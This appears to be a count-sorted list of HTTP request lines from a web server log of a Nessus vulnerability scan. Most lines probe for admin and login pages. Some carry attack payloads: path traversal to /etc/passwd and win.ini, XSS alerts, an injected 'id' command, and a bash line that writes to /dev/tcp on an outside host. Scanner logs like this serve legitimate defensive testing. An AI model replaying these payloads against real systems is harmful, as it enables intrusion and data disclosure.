1 GET /DB4Web/martin-nessus-ubuntu-4:23/foo HTTP/1.1
1 GET /Default.aspx HTTP/1.1
1 GET /DesktopDirector HTTP/1.1
1 GET /Director HTTP/1.1
1 GET /Explorer/index.html HTTP/1.1
1 GET /FywIN4NO.ashx HTTP/1.1
1 GET /HNAP1/ HTTP/1.1
1 GET /Home.do HTTP/1.1
1 GET /IDMProv/jsps/help/Help.jsp HTTP/1.1
1 GET /InitialPage.asp HTTP/1.1
1 GET /Login.aspx HTTP/1.1
4 GET /LoginPage.do HTTP/1.1
1 GET /MM/ HTTP/1.1
1 GET /MSWSMTP/Common/Authentication/Logon.aspx HTTP/1.1
2 GET /NASApp/nessus/ HTTP/1.1
1 GET /NCMContainer.cc HTTP/1.1
1 GET /NULL.ida HTTP/1.1
1 GET /OEMSettings.ini HTTP/1.1
1 GET /Orion/Login.asp HTTP/1.1
1 GET /Orion/Login.aspx HTTP/1.1
1 GET /OvCgi/freeIPaddrs.ovpl?netnum=127.0.0.1&netmask=255.255.255.0&netid=127.0.0.1%20|%20id| HTTP/1.1
1 GET /PUBLIC/ADMIN/INDEX.HTM HTTP/1.1
1 GET /PassTrixMain.cc HTTP/1.1
1 GET /Portal/Portal.mwsl?MainSelection=USFW&TabSelection=NONE&ClientArea=/Portal/usfw-login.mwsl&DataFile=NONE&TemplateFile=NONE HTTP/1.1
1 GET /RSAarcher/Default.asp HTTP/1.1
1 GET /RSAarcher/Default.aspx HTTP/1.1
1 GET /Reporting/login/change_password.php?enable_auth=0 HTTP/1.1
1 GET /SAPHostControl/?wsdl HTTP/1.1
2 GET /SE/EMC_SE.swf HTTP/1.1
1 GET /SE/appInfo.xml HTTP/1.1
1 GET /Sametime/buildinfo.txt HTTP/1.1
1 GET /Sametime/domino/html/sametime/buildinfoST75CF1.txt HTTP/1.1
1 GET /SchneiderUPS/ HTTP/1.1
1 GET /SilverStream/Meta/Tables/?access-mode=text HTTP/1.1
1 GET /SilverStream HTTP/1.1
1 GET /SiteScope/ HTTP/1.1
1 GET /SiteScope/cgi/go.exe/SiteScope?page=eventLog&machine=&logName=System&account=administrator HTTP/1.1
1 GET /SnoopServlet/ HTTP/1.1
1 GET /UDataArea?plugin=com.dell.oma.webplugins.AboutWebPlugin HTTP/1.1
1 GET /UtBhfNvo.soap HTTP/1.1
1 GET /ViewerFrame?Mode=Motion HTTP/1.1
2 GET /VncViewer.jar HTTP/1.1
1 GET /WEB-INF./web.xml HTTP/1.1
1 GET /WebID/IISWebAgentIF.dll?postdata=\"><script>foo</script> HTTP/1.1
1 GET /Webcam/webcam.html HTTP/1.1
1 GET /Websense/cgi-bin/WsCgiLogin.exe?Page=login&UserName=nessus%22%3e%3cscript%3ealert('websense_username_xss.nasl')%3c%2fscript%3e HTTP/1.1
1 GET /Wi6c8OuS.asmx HTTP/1.1
1 GET /Wsusadmin/Errors/BrowserSettings.aspx HTTP/1.1
1 GET /YUaGBcdG.asmx HTTP/1.1
3 GET /_mt/mt.cgi HTTP/1.1
1 GET /_vti_bin/fpcount.exe HTTP/1.1
1 GET /_vti_bin/shtml.dll/_vti_rpc HTTP/1.1
1 GET /about.jsp HTTP/1.1
1 GET /about HTTP/1.1
1 GET /aboutprinter.html HTTP/1.1
1 GET /acopia/ HTTP/1.1
1 GET /active.log HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /admin.back HTTP/1.1
3 GET /admin.cgi HTTP/1.1
1 GET /admin/LocalIndex.html HTTP/1.1
2 GET /admin/ HTTP/1.1
1 GET /admin/airflow/login HTTP/1.1
1 GET /admin/login.do HTTP/1.1
2 GET /admin/login.jsp HTTP/1.1
1 GET /admin/public/index.html HTTP/1.1
1 GET /admin/statistics/ConfigureStatistics HTTP/1.1
1 GET /admin_ui/mas/ent/login.html HTTP/1.1
3 GET /administrator.cgi HTTP/1.1
1 GET /altercast/AlterCast?op=%3cscript%3ealert(%22adobe_document_server_61.nasl%22)%3c%2fscript%3e HTTP/1.1
1 GET /ap// HTTP/1.1
1 GET /apex/f?p=nessuscheck HTTP/1.1
1 GET /apex/listenerConfigure HTTP/1.1
1 GET /api/getServices?name[]=$(/bin/bash%20-c%20%22nslookup%20log4shell-generic-GLrD5BQtRo2lgeiMbpqOten.w.nessus.org) HTTP/1.1
1 GET /api/getServices?name[]=$(bash%20-c%20%22echo%20exploited_PORT[80]by_nessus%20%3E/dev/tcp/10.128.0.4/37765\") HTTP/1.1
1 GET /api/hpe-restapi.json HTTP/1.1
1 GET /api/sonicos/is-sslvpn-enabled HTTP/1.1
1 GET /api/v1.0/environment HTTP/1.1
2 GET /api/v1/?format=api HTTP/1.1
1 GET /api HTTP/1.1
1 GET /app/idxasp.html HTTP/1.1
1 GET /app/ui/login.jsp HTTP/1.1
1 GET /apps/zxtm/login.cgi HTTP/1.1
1 GET /aspera/faspex/login/new?local=true HTTP/1.1
1 GET /assets/js/conf/global_config.js HTTP/1.1
4 GET /auth/login HTTP/1.1
1 GET /authenticate/login HTTP/1.1
1 GET /autodiscover/autodiscover.xml HTTP/1.0
1 GET /autopass/login_input HTTP/1.1
1 GET /av/api/1.0/system/local/tasks HTTP/1.1
1 GET /axis/DirectDownload.jsp HTTP/1.1
1 GET /axis2/services/CUPMService/ping HTTP/1.1
1 GET /baselining/version HTTP/1.1
1 GET /bitrix/admin/index.php?lang=en HTTP/1.1
1 GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /brightmail/viewLogin.do HTTP/1.1
1 GET /broadWeb/bwRoot.asp HTTP/1.1
1 GET /btmui/ HTTP/1.1
3 GET /buglist.cgi HTTP/1.1
1 GET /builtin/index.html HTTP/1.1
1 GET /cacti HTTP/1.1
1 GET /cas/login HTTP/1.1
1 GET /caucho-status HTTP/1.1
1 GET /cfg/shortcuts HTTP/1.1
3 GET /cgi-bin-sdb/printenv HTTP/1.1
1 GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1
1 GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1
3 GET /cgi-bin/Count.cgi HTTP/1.1
3 GET /cgi-bin/FormHandler.cgi HTTP/1.1
3 GET /cgi-bin/FormMail.cgi HTTP/1.1
3 GET /cgi-bin/admin.cgi HTTP/1.1
3 GET /cgi-bin/admin.pl HTTP/1.1
3 GET /cgi-bin/admin HTTP/1.1
3 GET /cgi-bin/administrator.cgi HTTP/1.1
3 GET /cgi-bin/administrator HTTP/1.1
3 GET /cgi-bin/agorn.cgi HTTP/1.1
1 GET /cgi-bin/authLogin.cgi HTTP/1.1
3 GET /cgi-bin/bugreport.cgi HTTP/1.1
1 GET /cgi-bin/camctrl.cgi HTTP/1.1
3 GET /cgi-bin/cart.cgi HTTP/1.1
1 GET /cgi-bin/client_execute.cgi?tUD=0 HTTP/1.1
3 GET /cgi-bin/clwarn.cgi HTTP/1.1
1 GET /cgi-bin/com5.pl HTTP/1.1
3 GET /cgi-bin/count.cgi HTTP/1.1
1 GET /cgi-bin/ctrldirect.cgi HTTP/1.1
1 GET /cgi-bin/faqmanager.cgi?toc=/etc/passwd%00 HTTP/1.1
3 GET /cgi-bin/faqmanager.cgi HTTP/1.1
1 GET /cgi-bin/filescan HTTP/1.1
3 GET /cgi-bin/guestbook.cgi HTTP/1.1
1 GET /cgi-bin/guestimage.html HTTP/1.1
3 GET /cgi-bin/help.cgi HTTP/1.1
3 GET /cgi-bin/hi HTTP/1.1
4 GET /cgi-bin/index.cgi HTTP/1.1
3 GET /cgi-bin/index.pl HTTP/1.1
3 GET /cgi-bin/index.sh HTTP/1.1
1 GET /cgi-bin/kvm.cgi?&file=login HTTP/1.1
3 GET /cgi-bin/login.cgi HTTP/1.1
1 GET /cgi-bin/login HTTP/1.1
1 GET /cgi-bin/luci HTTP/1.1
3 GET /cgi-bin/mailit.pl HTTP/1.1
3 GET /cgi-bin/mt-static/mt-check.cgi HTTP/1.1
3 GET /cgi-bin/mt-static/mt-load.cgi HTTP/1.1
3 GET /cgi-bin/mt/mt-check.cgi HTTP/1.1
3 GET /cgi-bin/mt/mt-load.cgi HTTP/1.1
3 GET /cgi-bin/ncbook/book.cgi HTTP/1.1
1 GET /cgi-bin/pdesk.cgi?lang=../../../../../../../../etc/passwd%00 HTTP/1.1
3 GET /cgi-bin/printenv.cgi HTTP/1.1
4 GET /cgi-bin/printenv HTTP/1.1
1 GET /cgi-bin/pub/pki?cmd=serverInfo HTTP/1.1
3 GET /cgi-bin/quickstore.cgi HTTP/1.1
3 GET /cgi-bin/search.cgi HTTP/1.1
3 GET /cgi-bin/search/search.cgi HTTP/1.1
3 GET /cgi-bin/search HTTP/1.1
3 GET /cgi-bin/status.cgi HTTP/1.1
3 GET /cgi-bin/status HTTP/1.1
3 GET /cgi-bin/test-cgi HTTP/1.1
3 GET /cgi-bin/test.cgi HTTP/1.1
3 GET /cgi-bin/test.sh HTTP/1.1
3 GET /cgi-bin/upload.cgi HTTP/1.1
3 GET /cgi-bin/urlcount.cgi HTTP/1.1
3 GET /cgi-bin/viewcvs.cgi HTTP/1.1
3 GET /cgi-bin/wa.cgi HTTP/1.1
3 GET /cgi-bin/wa.exe HTTP/1.1
3 GET /cgi-bin/wa HTTP/1.1
3 GET /cgi-bin/whois.cgi HTTP/1.1
1 GET /cgi-bin/wjaLeDLabxj1.asp HTTP/1.1
1 GET /cgi-bin/wjaLeDLabxj1.cfm HTTP/1.1
1 GET /cgi-bin/wjaLeDLabxj1.cgi HTTP/1.1
1 GET /cgi-bin/wjaLeDLabxj1.html HTTP/1.1
1 GET /cgi-bin/wjaLeDLabxj1.inc HTTP/1.1
1 GET /cgi-bin/wjaLeDLabxj1.php3 HTTP/1.1
1 GET /cgi-bin/wjaLeDLabxj1.php HTTP/1.1
1 GET /cgi-bin/wjaLeDLabxj1.pl HTTP/1.1
1 GET /cgi-bin/wjaLeDLabxj1.sh HTTP/1.1
1 GET /cgi-bin/wjaLeDLabxj1.shtml HTTP/1.1
4 GET /cgi-mod/index.cgi HTTP/1.1
3 GET /cgi-sys/defaultwebpage.cgi HTTP/1.1
3 GET /cgi-sys/entropysearch.cgi HTTP/1.1
3 GET /cgi/mid.cgi HTTP/1.1
1 GET /chassis/config/GeneralChassisConfig.html HTTP/1.1
1 GET /cld/ HTTP/1.1
1 GET /client/ HTTP/1.1
1 GET /clientaccesspolicy.xml HTTP/1.1
1 GET /cmf/login HTTP/1.1
1 GET /cms/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /com/novell/webaccess/WebAccessUninstall.ini HTTP/1.1
1 GET /common/about.php HTTP/1.1
1 GET /commoncgi/servlet/CCGIServlet?ApHost=PDT_InterScan_NT&CGIAlias=PDT_InterScan_NT&File=logout.htm HTTP/1.1
1 GET /conf/ssl/apache/integrity-smartcenter.key HTTP/1.1
1 GET /conf/ssl/apache/integrity.key HTTP/1.1
1 GET /configurations.do HTTP/1.1
1 GET /console/faces/com_sun_web_ui/help/helpwindow.jsp?windowTitle=%3c/title%3e%3cscript%3ealert(%27sun_java_web_console_helpwindow_xss.nasl%27)%3c/script%3e HTTP/1.1
1 GET /console/faces/com_sun_web_ui/help/masthead.jsp?windowTitle=%3c/title%3e%3cscript%3ealert(%27sun_java_web_console_helpwindow_xss.nasl%27)%3c/script%3e HTTP/1.1
1 GET /console/login/LoginForm.jsp HTTP/1.1
1 GET /content/eB35crRkiL.mp3 HTTP/1.0
1 GET /core/misc/drupal.js HTTP/1.1
1 GET /core/orionSplashScreen.do HTTP/1.1
1 GET /courier/web/1000@/wmLogin.html HTTP/1.1
1 GET /crossdomain.xml HTTP/1.1
1 GET /cs/idcplg?IdcService=GET_ENVIRONMENT&IsJson=1 HTTP/1.1
1 GET /csamc52/webadmin?page=invalid&type=browser HTTP/1.1
1 GET /cwhp/CSMSDesktop/about.jsp HTTP/1.1
1 GET /cwhp/XmpFileDownloadServlet?parameterName=downloadDoc&downloadDirectory=..\\..\\..\\Windows\\System32\\drivers\\etc\\&readmeText=1 HTTP/1.1
1 GET /ddem/ HTTP/1.1
1 GET /default.php HTTP/1.1
1 GET /dev/ HTTP/1.1
1 GET /devinfo.xml HTTP/1.1
1 GET /dfcweb/lib/cupm/nls/applicationproperties.js HTTP/1.1
1 GET /dms2/Login.jsp HTTP/1.1
1 GET /dndirector/dashboard/Show.dn HTTP/1.1
1 GET /dndirector HTTP/1.1
1 GET /dp/login.xml HTTP/1.1
1 GET /druid/index.html HTTP/1.1
1 GET /drupal/ HTTP/1.1
1 GET /drupal/core/misc/drupal.js HTTP/1.1
1 GET /drupal/misc/drupal.js HTTP/1.1
1 GET /drupal/update.php?op=info HTTP/1.1
1 GET /dtlt/home.html HTTP/1.1
1 GET /dwr/index.html HTTP/1.1
1 GET /ei31uPhU.ashx HTTP/1.1
1 GET /emsam/index.html HTTP/1.1
1 GET /en/main.js HTTP/1.1
1 GET /enter.php?goto=%2F HTTP/1.1
1 GET /eonapi/getAuthenticationStatus HTTP/1.1
1 GET /error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cautoexec.bat HTTP/1.1
1 GET /error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini HTTP/1.1
1 GET /error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini HTTP/1.1
1 GET /error_page.htm HTTP/1.1
1 GET /etc/passwd HTTP/1.1
1 GET /event/index.do HTTP/1.1
1 GET /ews/index.htm HTTP/1.1
1 GET /examples/jsp/source.jsp?%2e%2e/%2e%2e/%2e%2e/%2e%2e/system/autoexec.ncf HTTP/1.1
1 GET /exchweb/bin/auth/owalogon.asp?url=http[:]//12345678910 HTTP/1.1
1 GET /ext-js/app/common/zld_product_spec.js HTTP/1.1
1 GET /eyespyfx_large.jsp HTTP/1.1
1 GET /f360/login.jsp HTTP/1.1
4 GET /favicon.ico HTTP/1.1
1 GET /favicon.iso HTTP/1.1
1 GET /favicon2.iso HTTP/1.1
1 GET /features HTTP/1.1
1 GET /feed/ HTTP/1.1
1 GET /file HTTP/1.1
1 GET /fogbugz/default.php HTTP/1.1
1 GET /forum.php HTTP/1.1
1 GET /gateway/login HTTP/1.1
1 GET /geoserver/web/ HTTP/1.1
1 GET /getxml HTTP/1.1
1 GET /global.asa HTTP/1.1
1 GET /goanywhere/auth/Login.xhtml HTTP/1.1
1 GET /gwadmin-console/login.jsp HTTP/1.1
1 GET /hWI6bnas.aspx HTTP/1.1
1 GET /hazelcast/rest/cluster HTTP/1.1
1 GET /hc/admin/login/ HTTP/1.1
1 GET /hc/error/ HTTP/1.1
2 GET /header.php?tab=status HTTP/1.1
1 GET /header.php HTTP/1.1
1 GET /help/contents.htm HTTP/1.1
1 GET /help/introduction/release-notes.html HTTP/1.1
1 GET /helpdesk/WebObjects/Helpdesk.woa HTTP/1.1
1 GET /home.asp HTTP/1.1
3 GET /home.htm HTTP/1.1
1 GET /home.jsf?autoScroll=0%2c275)%3b%2f%2f--%3e%3c%2fscript%3e%3cscript%3ealert('myfaces_tomahawk_autoscroll_xss.nasl' HTTP/1.1
1 GET /home.seam HTTP/1.1
1 GET /horde/imp/status.php3 HTTP/1.1
1 GET /html/en/index.htm HTTP/1.1
1 GET /html/iscscada.htm HTTP/1.1
1 GET /iView3/pages/version.frag HTTP/1.1
1 GET /ibmmq/console/login.html HTTP/1.1
1 GET /ibmmq/console/nls/en/strings.json HTTP/1.1
1 GET /idc/idcplg?IdcService=GET_ENVIRONMENT&IsJson=1 HTTP/1.1
1 GET /idm/login.jsp?lang=en&cntry= HTTP/1.1
1 GET /ifx/?LO=../../../../../etc/passwd HTTP/1.1
1 GET /igsponsor HTTP/1.1
1 GET /iisadmpwd/aexp.htr HTTP/1.1
1 GET /iisadmpwd/aexp2.htr HTTP/1.1
1 GET /iisadmpwd/aexp2b.htr HTTP/1.1
1 GET /iisadmpwd/aexp3.htr HTTP/1.1
1 GET /iisadmpwd/aexp4.htr HTTP/1.1
1 GET /iisadmpwd/aexp4b.htr HTTP/1.1
1 GET /iisprotect/admin/SiteAdmin.ASP?V_SiteName=&V_FirstTab=Groups&V_SecondTab=All&GroupName=nessus' HTTP/1.1
1 GET /iisprotect/admin/SiteAdmin.ASP?V_SiteName=&V_FirstTab=Groups&V_SecondTab=All&GroupName=nessus HTTP/1.1
1 GET /images/login_top.gif HTTP/1.1
1 GET /images/logon_merge.gif HTTP/1.1
1 GET /images HTTP/1.1
1 GET /images HTTP/1.0
1 GET /imc HTTP/1.1
1 GET /img/main.cgi?next_file=main.htm HTTP/1.1
1 GET /imp/status.php3 HTTP/1.1
1 GET /index.JSP HTTP/1.1
1 GET /index.aspx HTTP/1.1
3 GET /index.cgi HTTP/1.1
1 GET /index.do HTTP/1.1
1 GET /index.exp HTTP/1.1
1 GET /index.html?urlmaskfilter=<script>foo</script> HTTP/1.1
8 GET /index.html HTTP/1.1
1 GET /index.jsp%00x HTTP/1.1
3 GET /index.jsp HTTP/1.1
1 GET /index.php/123 HTTP/1.1
1 GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1
1 GET /index.php HTTP/1.1
3 GET /index.pl HTTP/1.1
3 GET /index.sh HTTP/1.1
1 GET /internalServerReporting.php HTTP/1.1
1 GET /interscan/cgi-bin/FtpSave.dll?I'm%20Here HTTP/1.1
1 GET /intruvert/jsp/admin/Login.jsp HTTP/1.1
1 GET /invoker/EJBInvokerServlet HTTP/1.1
1 GET /invoker/JMXInvokerServlet HTTP/1.1
1 GET /item.fts?href=%22%3E%3Cscript%3Ealert(%22ftgate_44002.nasl%22)%3C%2Fscript%3E%3B HTTP/1.1
1 GET /ivc2/Backup/IVC1/html/index.htm HTTP/1.1
1 GET /jasperserver-pro/login.html HTTP/1.1
1 GET /js/Device.js HTTP/1.1
5 GET /js/hpsum/hpsum-version.js HTTP/1.1
1 GET /js/webcfg.js HTTP/1.1
1 GET /jts/ HTTP/1.1
1 GET /lang_pack/EN.js HTTP/1.1
1 GET /lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse HTTP/1.1
1 GET /lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/test.jse HTTP/1.1
1 GET /lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/viewcode.jse+httplist+httplist/../../../../../system/autoexec.ncf HTTP/1.1
1 GET /ldap/cgi-bin/ldacgi.exe?Action=Substitute&Template=../../../../../boot.ini&Sub=LocalePath&LocalePath=enus1252 HTTP/1.1
1 GET /lem/index.html HTTP/1.1
1 GET /libs/granite/core/content/login.html HTTP/1.1
1 GET /links_en.html HTTP/1.1
1 GET /login.do HTTP/1.1
1 GET /login.htm HTTP/1.1
1 GET /login.html?1600 HTTP/1.1
8 GET /login.html HTTP/1.1
2 GET /login.jsp HTTP/1.1
3 GET /login.php HTTP/1.1
1 GET /login.web HTTP/1.1
2 GET /login/ HTTP/1.1
1 GET /login/index.php HTTP/1.1
1 GET /login1.htm HTTP/1.1
3 GET /login?redirects=10 HTTP/1.1
1 GET /login?user=**%3Cscript%3EJavaScript:alert('cpanel_login_user_xss.nasl')%3B%3C%2Fscript%3E HTTP/1.1
1 GET /loginMsg.js HTTP/1.1
1 GET /login_up.php3?login_name=x&passwd=x&locale_id=../../../../../../../../../../../../boot.ini%00.jpg HTTP/1.1
15 GET /login HTTP/1.1
1 GET /logon.jsp HTTP/1.1
1 GET /logon?onok=%22%3e%3cscript%3ealert('axon_logon_xss.nasl')%3c%2fscript%3e HTTP/1.1
1 GET /logout HTTP/1.0
1 GET /mail/ HTTP/1.1
1 GET /main.cgi?next_file=main.htm HTTP/1.1
1 GET /main/web/status/ HTTP/1.1
1 GET /main_internet.php HTTP/1.1
1 GET /mainui/ HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /manager/text/list HTTP/1.1
1 GET /manual/ag/contents.htm HTTP/1.1
1 GET /map/sitemap.xml HTTP/1.1
1 GET /mapviewer/omserver?getv=t HTTP/1.1
1 GET /mdm/web/login.htm HTTP/1.1
1 GET /menu.htm HTTP/1.1
1 GET /mgmt/login?dest=%2Fmgmt%2Fgui%3Fp%3Dhome&reason=&username= HTTP/1.1
1 GET /misc/drupal.js HTTP/1.1
1 GET /mod_gzip_status HTTP/1.1
1 GET /mve/help/en/inventory/am_about.html HTTP/1.1
1 GET /mxhelp/cgi-bin/namazucgi?lang=/../../../../../../../../../../../../../boot.ini HTTP/1.1
1 GET /nacos/ HTTP/1.1
1 GET /names.nsf/view?ReadDesign HTTP/1.1
2 GET /nessus345678.html HTTP/1.1
1 GET /nessus\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1
1 GET /nessus\\..\\..\\..\\..\\..\\..\\winnt\\win.ini HTTP/1.1
1 GET /netbasic/websinfo.bas HTTP/1.1
1 GET /netflow/html/aboutus.jsp HTTP/1.1
1 GET /netmri/config/userAdmin/login.tdf HTTP/1.1
1 GET /niet1168928960.php HTTP/1.1
1 GET /niet120537049.jsp HTTP/1.1
1 GET /niet1336046234.aspx HTTP/1.1
1 GET /niet152467506.php3 HTTP/1.1
1 GET /niet1667099229.php5 HTTP/1.1
1 GET /niet1697433622. HTTP/1.1
1 GET /niet1751082149.cfm HTTP/1.1
1 GET /niet1793435723.html HTTP/1.1
1 GET /niet1908209074 HTTP/1.1
1 GET /niet1915022910.shtm HTTP/1.1
1 GET /niet2098479470.php6 HTTP/1.1
1 GET /niet370036763.asp HTTP/1.1
1 GET /niet587398197.htm HTTP/1.1
1 GET /niet706042459.php4 HTTP/1.1
1 GET /niet708015871.shtml HTTP/1.1
1 GET /niet880989203.jspx HTTP/1.1
1 GET /nifi/ HTTP/1.1
1 GET /nls/ApplicationProperties-en.json HTTP/1.1
1 GET /nnm/main HTTP/1.1
1 GET /no_such_file_4lYnd0xt.html HTTP/1.1
1 GET /nosuchfile-530863603-517031554.jsp HTTP/1.1
1 GET /note.txt?F_notini=&T_note=&nomentreprise=blah&filenote=../../windows/win.ini HTTP/1.1
1 GET /note.txt?F_notini=&T_note=&nomentreprise=blah&filenote=../../winnt/win.ini HTTP/1.1
3 GET /nph-mr.cgi HTTP/1.1
1 GET /nps/servlet/portal HTTP/1.1
1 GET /nps/servlet/portalservice HTTP/1.1
1 GET /nsn/..%5Cutil/chkvol.bas HTTP/1.1
1 GET /nsn/..%5Cutil/dir.bas HTTP/1.1
1 GET /nsn/..%5Cutil/glist.bas HTTP/1.1
1 GET /nsn/..%5Cutil/lancard.bas HTTP/1.1
1 GET /nsn/..%5Cutil/set.bas HTTP/1.1
1 GET /nsn/..%5Cutil/userlist.bas HTTP/1.1
1 GET /nsn/..%5Cweb/env.bas HTTP/1.1
1 GET /nsn/..%5Cwebdemo/fdir.bas HTTP/1.1
1 GET /nsn/env.bas HTTP/1.1
1 GET /nsn/fdir.bas HTTP/1.1
1 GET /nul.dbm HTTP/1.1
1 GET /ofbizsetup/control/checkLogin HTTP/1.1
1 GET /officescan/console/html/common/l10n/l10n.global.js HTTP/1.1
1 GET /oo/ HTTP/1.1
1 GET /ordermgr/control/checkLogin HTTP/1.1
1 GET /ords/ HTTP/1.1
1 GET /ossim/session/login.php HTTP/1.1
1 GET /otrs/index.pl HTTP/1.1
1 GET /page/portal/Design_Time_PG/Welcome HTTP/1.1
1 GET /pages/login.php HTTP/1.1
1 GET /password HTTP/1.1
1 GET /perl/samples/env.pl HTTP/1.1
1 GET /perl/samples/lancgi.pl HTTP/1.1
1 GET /perl/samples/ndslogin.pl HTTP/1.1
1 GET /perl/samples/volscgi.pl HTTP/1.1
1 GET /photo/lang/ENG.js HTTP/1.1
1 GET /php/php.exe?c:\\winnt\\win.ini HTTP/1.1
1 GET /platform-ui/ HTTP/1.1
1 GET /plc/webvisu.htm HTTP/1.1
1 GET /pls/apex/f?p=nessuscheck HTTP/1.1
1 GET /pls/portal/DEV1_PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
1 GET /pls/portal/DEV2_PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
1 GET /pls/portal/DEV3_PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
1 GET /pls/portal/DEV4_PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
1 GET /pls/portal/DEV5_PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
1 GET /pls/portal/DEV6_PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
1 GET /pls/portal/DEV7_PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
1 GET /pls/portal/DEV8_PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
1 GET /pls/portal/DEV9_PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
1 GET /pls/portal/DEV_PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
1 GET /pls/portal/PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
1 GET /pluto/portal/ HTTP/1.1
1 GET /portal/diag/index.jsp HTTP/1.1
1 GET /portal/page/portal/Design_Time_PG/Welcome HTTP/1.1
1 GET /portal/pls/portal/DEV1_PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
1 GET /portal/pls/portal/DEV2_PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
1 GET /portal/pls/portal/DEV3_PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
1 GET /portal/pls/portal/DEV4_PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
1 GET /portal/pls/portal/DEV5_PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
1 GET /portal/pls/portal/DEV6_PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
1 GET /portal/pls/portal/DEV7_PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
1 GET /portal/pls/portal/DEV8_PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
1 GET /portal/pls/portal/DEV9_PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
1 GET /portal/pls/portal/DEV_PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
1 GET /portal/pls/portal/PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
1 GET /portal HTTP/1.1
2 GET /properties/configuration.php?tab=Status HTTP/1.1
1 GET /properties/description.dhtml HTTP/1.1
1 GET /ptz.htm HTTP/1.1
1 GET /public/ HTTP/1.1
1 GET /puppet-ca/v1/certificate/83.118.68.34.bc.googleusercontent.com HTTP/1.1
1 GET /puppet/v3/facts/83.118.68.34.bc.googleusercontent.com HTTP/1.1
2 GET /qIgmFGdCUSK2 HTTP/1.1
2 GET /qip HTTP/1.1
1 GET /qsoap.qap HTTP/1.1
3 GET /query.cgi HTTP/1.1
1 GET /query.idq?CiTemplate=../../../../../winnt/win.ini%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 HTTP/1.1
1 GET /query.idq?CiTemplate=../../../../../winnt/win.ini HTTP/1.1
1 GET /qwe/qwe/index.html HTTP/1.1
1 GET /rails_info/properties HTTP/1.1
1 GET /rcladmin/js/art_i18n/nls/art_i18n.js HTTP/1.1
1 GET /rdweb/login/login.html HTTP/1.1
1 GET /recoveryconsole/ HTTP/1.1
1 GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1
1 GET /reporter/client.jsp HTTP/1.1
1 GET /rest-service/reviews-v1/versionInfo HTTP/1.1
1 GET /restconf HTTP/1.1
3 GET /robots.txt HTTP/1.1
1 GET /ruei/index.php HTTP/1.1
1 GET /sabin/SiteAdmin.htm HTTP/1.1
1 GET /sapmc/sapmc.html HTTP/1.1
1 GET /sawmill6cl.exe?ho+{COMPLETE_VERSION} HTTP/1.1
1 GET /sawmillcl.exe?ho+{COMPLETE_VERSION} HTTP/1.1
1 GET /sc3/console.php?psid=101 HTTP/1.1
1 GET /scgi-bin/platform.cgi HTTP/1.1
1 GET /scmadmin/LocalIndex.html HTTP/1.1
1 GET /scmadmin/ HTTP/1.1
1 GET /scripts/fake.cgi?arg=/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini HTTP/1.1
1 GET /scripts/fake.cgi?arg=/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/winnt/win.ini HTTP/1.1
1 GET /scripts/fake.cgi?arg=/dir/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
1 GET /scripts/fake.cgi?arg=/dir/../../../../../../../../../../../windows/win.ini HTTP/1.1
1 GET /scripts/fake.cgi?arg=/dir/../../../../../../../../../../../winnt/win.ini HTTP/1.1
1 GET /scripts/fake.cgi?arg=/dir/../../../../../../etc/passwd HTTP/1.1
1 GET /scripts/w3who.dll HTTP/1.1
1 GET /scripts/wjaLeDLabxj1.asp HTTP/1.1
1 GET /scripts/wjaLeDLabxj1.cfm HTTP/1.1
1 GET /scripts/wjaLeDLabxj1.cgi HTTP/1.1
1 GET /scripts/wjaLeDLabxj1.html HTTP/1.1
1 GET /scripts/wjaLeDLabxj1.inc HTTP/1.1
1 GET /scripts/wjaLeDLabxj1.php3 HTTP/1.1
1 GET /scripts/wjaLeDLabxj1.php HTTP/1.1
